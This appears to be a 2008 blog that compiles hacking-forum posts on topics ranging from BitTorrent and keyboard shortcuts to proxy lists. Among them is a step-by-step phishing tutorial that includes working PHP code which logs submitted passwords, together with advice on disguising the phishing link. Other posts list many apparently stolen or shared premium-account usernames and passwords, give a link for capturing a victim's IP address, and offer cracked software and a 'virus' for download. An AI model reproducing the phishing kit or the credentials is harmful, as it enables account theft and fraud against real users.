Bit Torrent Tutorials

The first things you need to know about using Bit Torrent:
-- Bit Torrent is aimed at broadband users (or any connection better than dialup).
-- Sharing is highly appreciated, and sharing is what keeps bit torrent alive.
-- A bit torrent file (*.torrent) contains information about the piece structure of the download (more on this later)
-- The method of downloading is not your conventional type of download. Since downloads do not come in as one
big chunk, you are able to download from many people at once, increasing your download speeds. There may be
100 "pieces" to a file, or 20,000+ pieces, all depending on what you're downloading. Pieces are usually small (under 200kb)
-- The speeds are based upon people sharing as they download, and seeders. Seeders are people who constantly
share in order to keep torrents alive. Usually seeders are on fast connections (10mb or higher).

In this tutorial, I will be describing it all using a bit torrent client called Azureus. This client is used to decode the .torrent files into a useable format to download from other peers. From here on out, I will refer to Bit Torrent as BT.

Which BT client you use, is purely up to you. I have tried them all, and my personal favorite is Azureus for many reasons. A big problem with most BT clients out there, is that they are extremely CPU intensive, usually using 100% of your cpu power during the whole process. This is the number one reason I use Azureus. Another, is a recently released plug-in that enables you to browse all current files listed on suprnova.org (the #1 source for torrent downloads).

Before you use the plug-in, take a look at /http://www.suprnova.org, and browse the files. Hold your mouse over the links, and you'll notice every file ends in .torrent. This is the BT file extension. Usually, .torrent files are very small, under 200kb. They contain a wealth of information about the file you want to download. A .torrent file can contain just 1 single file, or a a directory full of files and more directories. But regardless, every download is split up into hundreds or thousands of pieces. The pieces make it much easier to download at higher speeds. Back to suprnova.org. Look at the columns:

Added Name Filesize Seeds DLs (and a few more which aren't very useful.)

I'll break this down.
Added: Self explanitory, its the date the torrent was added.
Name: Also self explanitory.
Filesize: Duh
Seeds: This is how many people are strictly UPLOADING, or sharing. These people are the ones that keep .torrent files alive. By "alive", I mean, if there's no one sharing the .torrent file, no one can download.
DLs: This is how many people currently downloading that particular torrent. They also help keep the torrent alive as they share while they download.

It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.

Now that you should understand how torrent files work, and how to use them, on to Azureus!
First, get JAVA! You need this to run Azureus, as java is what powers it. Get Java here: /http://java.sun.com/j2se/1.4.2/download.html
Next, get Azureus at: /http://azureus.sourceforge.net
Next, get the Suprnovalister plugin from /http://s93732957.onlinehome.us/storage/suprnovalister.jar

Install Java JRE before you do ANYTHING.

Install Azureus, and then in the installation folder, create 2 more folders. ./Plugins/suprnovalister (For example, if you installed Azureus to C:\PROGRAM FILES\AZUREUS, create C:\PROGRAM FILES\AZUREUS\PLUGINS\SUPRNOVALISTER). Next, put the suprnovalister.jar file that you downloaded, in that folder.

Load up Azureus, and if you want, go through the settings and personalize it.

The tab labeled "My Torrents" is the section of Azureus you need the most often. That lists all your transfers, uploads and downloads. It shows every bit of information you could possibly want to know about torrents you download.

In the menu bar, go to View > Plugins > Suprnova Lister. This will open up a new tab in Azureus. Click on "Update Mirror". This will get a mirror site of suprnova.org containing all current torrent files available. Once a mirror is grabbed, choose a category from the drop-down box to the left and click "Update". Wah-lah, all the available downloads appear in the main chart above. Just double click a download you want, and bang its starting to download. Open the "My Torrents" tab again to view and make sure your download started.

After your download has finished, be nice, and leave the torrent transferring. So people can get pieces of the file from you, just as you got pieces from other people.

Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File > Open > .torrent File in Azureus.

This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it.

"Phishing for Dummies "For Education

2008-12-30T00:51:00.000-08:00

This is for educational purpose only.Downloaded from hackforums

Phishing Tutorial (Very clear and good for newbs)

The one Corw made on HF was very good, but some people had problems. This will be a basic tut on how to make a phisher! I will be using a variety of websites. Crow used myspace, but I will teach you how to make it with any!

Index:
What is a phisher? - 101
Making a T35 Account - 102
Getting Web pages Source Code - 103
Creating Phish File - 104
How to fool people - 105
------------------------
What is a phisher? 101
------------------------

A phisher is a fake login page used to gain access to someones account. When someone logs into the fake login page, there password is sent to you.

--------------------------
Making a T35 Account 102
--------------------------

In order to make a phisher, you need a web hosting site, I recommend T35. Sign up with a free acount and title it (websiteyourgonnaphish).t35.com For example: myspace.t35.com Most likeley, it is taken so add numbers like 08, or 07.

--------------------------------------
Getting Web Pages Source Code 103
--------------------------------------

After you create that page, go to the website you will make a phisher for, I will use KHI ( http://www.forums.khinsider.com ) Make sure you are logged out and and attempt to post a message. You will get an error saying you must log-in. From tehre right-click the page, and click View Source. Copy and paste what has popped-up.

------------------------
Creating Phish File 104
------------------------

Once you have that copied, go to your T35 account. Click on "New File" Title it login.htm Then paste your Source Code you copied from 104. Save it.

Now create another file, title it fhish.php And inside, paste this code:

Code:
header("Location: http://www.myspace.com");
$handle = fopen("thepasses.txt", "a");
foreach($_GET as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

The http://www.myspace.com is what the page goes to after the victim logs in, change that to what desired

Save the file.

Go back to your login.htm file and click edit. Press CTRL+F and type in action= in the box. Keep pressing find until you find something that says action=(something that has to do with logging in). Replace that with fhish.php. Congratulations, you have a phisher!

-------------------------
How to fool people - 105
-------------------------
What you do now is disguise your link. Use this code:

Code:
T35acount.t35.com/login.htm

That is the link to your phishing page. When people login to that, you will get the password in a password.txt file that will be created when someone types something into it. But, you have to trick people. Use this code.

Code:
[url=xxx.t35.com]*real website name*.com/login.php[/url]

You do the same for any forum!

Some hacked premium accounts

2008-12-28T06:18:00.000-08:00

http://gamedownloadnow.com
Your username is: ga20me
Your password is: ke01feb

www.divxcrawler.com account
Username: divx273
Password : 8342729

www.unlimitedgamedownloads.com
User Name : ga20me
Password : ke01feb

http://suprnova.com/login.php
Username: mpuv3y
Password: umvpy3x

http://www.fulldownloads.us
Username-Af872HskL
Password- XjsdH28N

www.pirateaccess.com
Username-NUO9UH
Password-kXpEYF

http://tvadvanced.com/login.asp
Your username is: mv03dl
Your password is: frmvdl

http://www.pirateaccess.com FREE ACCOUNTS

account h4gpOM
password Ca0i25

account e2ZTjs
password zqObNO

account gC7mtB
password CXGB40

www.downloadprofessional.com

Username: lo886Ees
Password: zAgt88er

www.warezquality.com

Username: ageg2020
Password: z8fsDfg3
Njoy!!!!

Simple way to hack RapidShare Premium account

2008-12-26T04:31:00.000-08:00

This is my first tutorial guys, written by my own hand!!! ^_^

Anyways it's on how to "Hack" Rapidshare to get Premium links!

Dont Forget Guys this is my first tut!!!...so take it easy on me...lol!!!

Here it is...Hope you enjoy!!!

Files needed!

- Firefox! (Download it at http://www.firefox.com)

- Then you will need a firefox addon called Greasemonkey! it's a great addon!
(Download it here: https://addons.mozilla.org/en-US/firefox/downloads/file/16465/greasemonkey-0.7.20070607.0-fx.xpi)

- Then you will need a special script for Greasemonkey (Download it here: http://rs262.rapidshare.com/files/76969319/firefoxuser.rar)

Step 1: Download and install firefox!...lol...pretty easy!

Step 2: Head over to the Greasemonkey link and install it!

Step 3: Restart Firefox! and install the special script by simply dragging the script file into firefox!

Now when you go to Rapidshare!!! Everything will be different and there will be some instructions on how to download with the links!!!

Hope this helps!!!....lol...dont forget this is my first tut!!! ^_^

Bye!!! Chaos_Chicken!!!
from hackforums

Know my IP?

2008-12-25T01:36:00.001-08:00

get anybodys ip easy and quick with just a link

below i give a way to obtain your friends or whatever person u want IP
with just sending him a link to visit

Code:
http://rpgcrime.com/send.swf?msg=themaintextoftheflashfilegoeshere&email=xxxxxxxxxxx

where:xxxxxxxxxx (insert ur mail)

just send him the link and the IP will come to ur e-mail inbox...

from hackforums

Free Premium Accounts for downloading

2008-12-25T01:36:00.000-08:00

Following are the list of usernames and passwords of the premium accounts for Best downloads sites.
…!! ENJOY !!…
!!…100% Working Accounts…!!

1.) www.divxcrawler.com {download movies fastly}

Username : divx273
Password : 8342729

2.) www.butterflydownloadnetwork.com {movies, music, Pc Games, Tv shows}

Username : cinemanetwork20
Password : butterfly20

3.) www.downloadprofessional.com {movies,Pc softwares, Pc Games, Tv shows}

Username : lo886Ees
Password : zAgt88er

4.) www.sharingzone.net {movies, Pc softwares, Pc Games}

Username : LODMQYHX
Password : 375021402
Receipt : 4T5W89RD

5.) www.unlimitedgamedownloads.com {movies, Pc Games, psp softwares}

Username : ga20me
Password : ke01feb

6.) www.watchdirect.tv {movies, music, Pc Games, online Tv}

Username : cinemanetwork20
Password : butterfly20

7.) www.fullreleasez.com {Greatly Every thing}

Username : Af872HskL
Password : XjsdH28N

8.) www.fulldownloads.us {Greatly Every thing}

Username : Af872HskL
Password : XjsdH28N

9.) www.pirateaccess.com {Every thing}

Username : yourfrienddalat@gmail.com
Password : CHh5LKPI

Username : xxx_heel_xxx@yahoo.com
Password : MJY0BUY

Username : i_l0ve_u_786@yahoo.com
Password : rYvLgPrt

Username : mubashar_siddique@yahoo.com
Password : F9Gzgwb5

10.) www.warezquality.com {Every thing}

Username : ageg2020
Password : z8fsDfg3

11.) wwww.warezreleases.com {All Stuff}

Username : HnRPxKQz
Password : a59KBV7

Username : a25bipZP
Password : 1TeVnoJb

Username : SHYyJfWU
Password : P4K20uO

12.) www.fulldownloadaccess.com {All Stuff}

Username : mpuv3y
Password : umvpy3x

13.) www.alphaload.com {All Stuff}

Username : AL3429352
Password : ykbcKTNS

Username : AL3429355
Password : RCHAbhKM

Username : AL3429350
Password : gMZNFcyS

Username : AL3429351
Password : cTAkWAxc

Username : AL3429352
Password : ykbcKTNS

14) www.gamedownloadnow.com {All Stuff}

Username : ga20me
Password : ke01feb

15.) www.unlimiteddownloadcenter.com {All Stuff}

Username : cu20me
Password : ke01feb

16.) www.tvadvanced.com {online Tv}

Username : mv03dl
Password : frmvdl

Hacks to beat Rapidshare(Advanced)

2008-12-25T01:29:00.000-08:00

We all know that getting a new IP address from ISP allows us to download the next file from RapidShare. I bet many of us know this concept long ago but there wasn’t any program that can do this. Now, here is a program called Cryptload that is able to download the first file automatically without you entering the CAPTCHA code, and when it finished downloading, it will try to download the second file. Once it detects “You have reached the download-limit for free-users” message from RapidShare, it’ll disconnect and reconnect your Internet to get a new IP address. Then it’ll continue downloading the second file. All this is done automatically and you only need to add the RapidShare links to Cryptload. How easy is that?

But before you get to automate RapidShare downloading, I’ll show you what you need to do because I was stuck for a few days on Cryptload with some problems. Most important setting that you must get it right is the Router section. Other than that, there is nothing else you need to configure in Cryptload. You can access Cryptload options by clicking the top right button that looks like this. Click on the Router button to configure your router settings. If you are using a modem to connect to the internet, select the Modem button. How do you know if you’re using a modem or router? If you need to dial up to the Internet like the below image, then you’re using a modem.

If your internet automatically when you turn on the power for the small box, then it’s a router. So if you are using a router, click on the dropbox and search for your router model in the list.

Here are the settings you must configure correctly.

IP Address: The IP Address of your router. To know your router’s IP address, run command prompt, type ipconfig and the Default Gateway is your router’s IP address.
Username and Password: The username and password used to login to your router. Please check your router’s manual if you don’t know the default login data.
Waittime after reconnect in sec: This is the time that it’ll wait to download the next RapidShare file after Cryptload tries to reconnect to the Internet. It depends on your ISP. Some might take longer to reconnect. Try 15 seconds first and if your Internet doesn’t gets connected before 15 seconds, increase it to 30 seconds and so on…

Now you can use Cryptload to automate RapidShare downloading. Here is how I do it.

1. Collect all RapidShare links that I want to download and paste them into a text file.
2. Run Cryptload
3. On the text file, press CTRL+A to select all, and then press CTRL+C. Link collector will appear and it will automatically decrypt the links.
4. Press Add button and press OK at Package settings. You can change the downloaded files location if you want.

What if your router’s model is not in the list?

Not to worry at all because the people who created Cryptload are very nice people and they are very willing to help you to create CLR file to support your router. Here’s what you need to do.

1. Install Live HTTP Headers extension for your Firefox browser.
2. Run Firefox, go to Tools -> Live HTTP Headers. Make sure capture checkbox is checked.
3. Go to Firefox window, login to your router, manually disconnect and then reconnect to the internet.
4. Go back to the Live HTTP headers, click Save all button and save it as router.txt
5. Click close to close Live HTTP headers.
6. Go to www.nopaste.com, enter your name in Nick, Description as your router brand with model and firmware version if possible. Make sure Plain is selected for language. Click on the Browse button and look for the router.txt file. Finally click Paste.
7. Wait for a few seconds, and you’ll be forwarded to a new page with the URL something like http://nopaste.com/p/xXXxxXxxX.
8. Go to www.cryptload.info website, at Live-Support, enter your username (your name), E-mail and click Los button. If cryptload staff is available, you can give them the nopaste URL to create your router’s CLR file. If not, you can fill up the form to send an email to them. I am sure they’ll get back to you with your CLR file.

Another way is to join Cryptload IRC channel and try getting help there. The person that patiently helped me from the beginning till the end was Apokalypser.

IRC Server: irc.german-elite.net
Channel: #cryptload

Once you got the CLR file from Cryptload staff, copy it to Cryptload’s router folder and it’ll be included in the router list when you run Cryptload the next time. Cryptload is a perfect way to unlimited rapidshare downloading. Well, only perfect for those with dynamic IP address. It is developed by shira, bocka and apokalypser. For those with static IP adress Rapid GraB may be the best way for you. NOTE: Cryptload requires at least Microsoft .NET Framework v2.0 and above. [ Download Cryptload Cryptload Website ]

How to make money online

2008-12-25T01:28:00.000-08:00

How to make money online

Alright, A nice guide to making money online. Enjoy. This guide only has two websites, because these two are the BEST. the EASIEST. and the most EFFECTIVE. So bear with me.
Neobux. Neobux is by far the BEST PPC/PTC (Pay-Per-Click) program available. I can confirm it's legitimacy.

It has a clear cut and very intuitive interface, making it very user-friendly and actually, FUN to use. (Seriously). It has popular forums, and a chat-room for you to chat in (duh) as well.

You earn one cent per click, and 0.5 for a click of your referrals. There is also a few very... Interesting and unique features, jackpots. :D

You pay Neobux (Either from your already made money [Balance] or from paypal/alertpay a certain amount of money to get a chance to win much more money. :P

5 types of Jackpots.

1) Referral Jackpot:
prizes:
110 referrals paid for the month,
Price:
2.5 dollars per ticket.
maximum of 100 tickets. (

2)Regular JackPot
Price: $1
Maximum tickets: 40
Chance of winning: 5/100 for one ticket, 25/100 for five tickets, etc.
prizes:
1st prize: $20
2nd prize: $12
3rd prize: $8
4th prize: $6
5th prize: $4

3) Mini Referral Jackpot
Price: $0.25
Chance of winning: 5/100
Prize: 10 referrals Paid for one month. Maximum of 5 prize winners.

4) Mini Regular Jackpot
Price: $0.10
Chance of winning: 5/100
Prize:
1st prize: $2
2nd prize: $1.2
3rd prize: $0.8
4th prize: $0.6
5th prize: $0.4

5) MEGAJACKPOT!!
Price: Depends, minimum $0.10
Chance of winning: Depends
Prize: Depends. Currently, the prize is:
Place 1:$353.75
Place 2:$176.87
Place 3:$84.90
Place 4:$56.60
Place 5:$35.37
With two days left. This usually manages to catch quite a lot of attention, and for good reason!

Anyway, that's it for Neobux! Say good-bye for now, if you want to head on over and register (Not a bad idea. ;) )
Click Here

http://www.ghacks.net/2007/08/11/make-money-online-with-cashcrate/

Cashcrate:

Cashcrate offers a free and easy way to earn money regularly by simply filling out some surveys every day. Iâ€™m really cautious when I hear of websites that offers something in the line of â€œTake Surveys - Earn Moneyâ€ because most of them seem to really rip of the users with ultra-high payout restrictions or just a few surveys which means that it takes ages to make some decent money.

Cashcrate seems to be different, at least for users from the United States, Canada and the UK. Everyone may join but the availability of surveys and offers depends on your location. If you live in Germany or India for instance you see two surveys and two offers to join a service to receive some money from it.

If you join as a American you get to literally chose from hundreds of surveys and two guaranteed daily surveys that bring in $1.60 per day if you complete both each day.

This means that you can earn $584 per year from just taking the daily surveys which is about $49 extra cash per month in your pockets. Minimum payout is $10 which means that you do get paid monthly if you take just the daily surveys.

You do have two options to earn more money. The first is to take surveys that are offered by other companies which bring in between $0.40 to $1.50 in average with dozens of surveys available currently. I would estimate that you could at least make $50 by taking those surveys as well in the month.

This would raise the monthly income to nearly $100 for just taking a few surveys. Now imagine that your girlfriend, friends or relatives sign up for the service as well.

There is a second way to earn money and that is by signing up to various services. Some require just a signup and some personal data such as your email or mobile phone number to reward you with money while others offer free trial versions or purchases.

Those bring in some serious cash. Want some examples ?

* If you signup at eBay for free and make a bid you receive $8
* A free trial at Vonage brings in $45
* A free trial membership at Netflix brings in $13.50

I canâ€™t calculate all the possible earnings but I would think that you could earn at least $100 from Cashcrate every month and even more if you take your time and evaluate all options.

Last but not least some offers award points instead of cash. This means that you do get a certain amount of points after completing a survey or other offer and can use those points to buy items in the prize shop. 300 points can be traded into a $15 iTunes gift card for instance and 6000 points into a Xbox 360.

Some surveys and free trials bring in around 300 points which is another great opportunity to gain something for free.

Cashcrate is free to join, there are no hidden fees, a minimum payout of $10 and a monthly payout. What are you waiting for ?

Cashcrate is also interesting for webmasters because it offers a two-tiered referral structure. You earn 20% / 10% by referring users to the site and an additional $3 whenever someone makes his first $10.

Take a look at several checks that a user received while using Cashcrate, the last check shows more than $480 !

CashcrateTips

* Visit the CashCrate Forum for a wealth of information and new monthly competitions
* Create a new email address at a webmailer and use it exclusively for offers. This way your main email remains unknown.
* Get a new free phone number from a company like Private Phone and use this one exclusively on CashCrate.
* Get a Visa Gift or Prepaid Card and use it in those cases where you have to enter credit card information.
* The best offers are the free ones that you do for free (most of the time surveys), you can sort all offers to see those at the beginning
* Make sure you cancel the trial offers during the trial period or you will get charged afterwards.
* Cookies: Cookies, being the number one cause of offers not confirming, simply must be cleared in between each offer. Why? Because companies track you through cookies, and for more than one offer from the same company, you need to clear them so you can be tracked again correctly, and so your offer will confirm.
* Email Recycling: Again, companies with more than one offer on the list track you with your email address as well, and if they already have that email in their database, then your offer will not confirm. Simply create 10 or more email addresses from any email provider, (The ones listed above are recommended) and change them up among offers. The more email addresses you have, the less of a chance youâ€™ll submit the same email to the same company twice.

Filling out Offers at Cashcrate

* Offers with the following descriptions have easier requirements than you think!
* â€œParticipate in the Surveyâ€, Without Questionare (Usually 60 cent or less payout): These offers only require you to provide your information, (usually on the first or second page of the â€œSurveyâ€) once it seems like the offer has taken you into an infinite loop of â€œYesâ€, â€œNoâ€, or â€œSkipâ€ offer pages, then you can exit that window, and submit the offer, and it should confirm. Even though you only have to submit your information, I always do the first 5 pages of these types of offers to be on the safe side.
* â€œParticipate in the Surveyâ€, With Questionnare (Usually 65 cent or higher payout): These offers will ask you to fill out your information, and then require you to do a 3 to 5 minute Questionnare. You actually do have to complete this, but you only have to go until it says â€œDone!â€ or â€œCongratulations, youâ€™ve been entered!â€, even though there may still be questions below the â€œDone!â€ or Congratulations!..â€.
* â€œComplete at least the first two pagesâ€: Obviously, you only have to fill out the first two pages. Most offers will tell you things like â€œyour almost done!â€ or â€œlast pageâ€, you do NOT have to keep going after you complete the first two pages.
* â€œFill Out the Formâ€: These offers are usually from $0.75 to $2.00, and you actually have to fill out the pages, and like the Questionare offers, you only have to go until it says â€œDone!â€ or â€œCongratulations, youâ€™ve been entered!â€ even though there may still be questions below.
* IMPORTANT NOTE: On all of the free offers above, in the forms, questionares, and providing information, you only have to respond to the sections that have an ASTERISK â€ * â€ next to them, all other questions/sections are optional and do not need to be filled out.

The last tips were found at the CashCrate forum

Sign up
HERE!

I would also appreciate if you guys sign up under my referral link, basically, by clicking on one of the linked words (NeoBux/Cashcrate) This will sign you up to be my referral, which means I get a percentage of what you make. (You won't lose anything)
This will make me more willing to post quality tutorials such as the ones here:
http://www.hackforums.net/showthread.php?tid=28651

Thanks!

How to make money online

2008-12-25T01:24:00.000-08:00

How to make money online

Essential Shortcuts

2008-12-19T07:23:00.000-08:00

Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.

SHIFT....... five times Switch StickyKeys on and off.

NUM LOCK...... for five seconds Switch ToggleKeys on and off.

explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.

NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.

NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.

LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.

Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog

internetbrowser

type in u're adress "google", then press [Right CTRL] and [Enter]
add www. and .com to word and go to it

For Windows XP:

Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an it

-----------------------------------------------------------------------------------------------------------------------------

Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

Use these keyboard shortcuts for dialog boxes:

To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB

-----------------------------------------------------------------------------------------------------------------------------------

Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:

Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U

shortcuts you can use with Windows Explorer:

Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW

Good websites for free surfing the Internet,access blocked websites

2008-12-19T07:10:00.000-08:00

90+ Proxy Websites To Access Blocked Websites

1. http://www.hidemyass.com
2. http://www.anonymizer.com
3. http://www.wujie.net
4. http://www.ultrareach.net
5. http://surfshield.net
6. http://www.guardster.com/subscription/proxy_free.php
7. http://anonymouse.ws/anonwww.html
8. http://www.browser-x.com
9. http://www.spysurfing.com
10. http://www.xerohour.org/hideme
11. http://www.proxyz.be
12. http://www.sc0rian.com/prox
13. https://www.proxify.us
14. http://kproxy.com/index.jsp
15. http://www.brawl-hall.com/pages/proxy.php
16. http://www.proxify.net
17. http://proxy.computersteroids.com/index0.php
18. http://www.unipeak.com
19. http://flyproxy.com
20. http://alienproxy.com
21. http://proxify.com/
22. http://www.unfilter.net
23. http://www.proxymouse.com
24. http://www.surfonym.com/cgi-bin/nph-proxy
25. http://www.superproxy.be/browse.pl
26. http://www.websiteguru.com/mrnewguy
27. http://www.letsproxy.com
28. http://www.fsurf.com
29. http://indianproxy.com
30. http://www.letmeby.com
31. http://Boredatschool.net
32. http://www.ibypass.org
33. http://www.ipzap.com/
34. https://proxify.biz
35. http://kproxy.com/index.jsp
36. http://www.attackcensorship.com/attack-censorship.html
37. http://mrnewguy.com
38. http://www.evilsprouts.co.uk/defilter
39. http://www.proxify.info
40. http://www.torify.com
41. http://www.switchproxy.com
42. http://www.proxifree.com
43. http://www.secure-tunnel.com/
44. http://www.proxify.cn
45. http://www.arnit.net/utilities/webproxy/new
46. http://www.proxify.co.uk
47. http://www.betaproxy.com
48. http://www.proxify.org
49. http://www.proxychoice.com
50. http://www.proxysnail.com
51. http://www.anonypost.com
52. http://www.thestrongestlinks.com
53. http://www.hujiko.com
54. http://www.anonproxy.info
55. http://www.peoplesproxy.com
56. http://www.freeproxy.us
57. http://www.proxyweb.net
58. http://www.nopath.com
59. http://urlencoded.com
60. http://www.pole.ws
61. http://www.browseany.com
62. http://www.spiderproxy.com
63. http://www.clickcop.com
64. http://www.sneakysurf.com
65. http://www.mywebtunnel.com
66. http://www.thewebtunnel.com
67. http://www.3proxy.com
68. http://www.yourfreeproxy.com
69. http://www.proxy7.com
70. http://www.fireprox.com
71. http://www.stupidcensorship.com
72. http://www.letsproxy.com
73. http://www.sneak2.com
74. http://www.cecid.com
75. http://www.freeproxy.ca
76. http://www.ibypass.org
77. http://www.goproxing.com
78. http://www.projectbypass.com/
79. http://www.ipsecret.com
80. http://www.nomorelimits.net
81. http://www.proxify.de
82. http://www.bywhat.com
83. http://www.snoopblocker.com
84. http://www.anonymizer.ru
85. http://www.proxyking.net/
86. http://www.perlproxy.com
87. http://www.proxylord.com
88. http://tntproxy.com
89. http://satanproxy.com
90. http://zombieinvasion.info
91. http://demonproxy.com
92. http://www.myfreeproxy.com
93. http://www.gezcem.com/nph-proxy.pl.old
94. http://mpleger.de
95. http://www.the-cloak.com/login.html

Great Programs to Download

2008-12-18T07:54:00.000-08:00

This is ISO maker,Magic ISO,great software,don't miss it,download here

Uh...this is the software that can transform bat to exe! IF you need that take here

This is the 3GP video converter,Full version, Really great ,you can convert Mp3,Mp4,Avi....etc Great@! download here

You want to download the whole website,easy, download here

This is the Oxford Dictionary, if you thought you need , download here

This is the virus,! You want to test that ? Download here
This is the antivirus of above virus software.Run that software and your computer is getting normal like old days. download here

Really fast and secure downloads, try that internet download manager+ crack file, you can easily download here

Great portable software,Foxit PDF reader,
download here

If you have a sound driver problem, try this Realtek sound driver.here

This is the VLC media player, that player can open any format,like training lessons, everything , download here

You want to make Bootable USB ? try this

This is the Virtual DJ +crack file . after installation,place crack file into your destination folder. Download here

Scrabble game ,man .improve your brain,easy download this

This is Mozilla FireFox version 3.0 ,easy download here

Your school or somewhere ,websites banned? Access Denied? This is the anonymous proxy software.really great!! UltraSurf .it can automatically download to latest version.Just open that software. here

This is the USB virus killer.Really effective against autorun.inf,svhost.exe,fun.exe,flashy.exe,explorer.exe(HappyBirthday Virus),winomc.exe...etc.In about 1SEc!!! Download here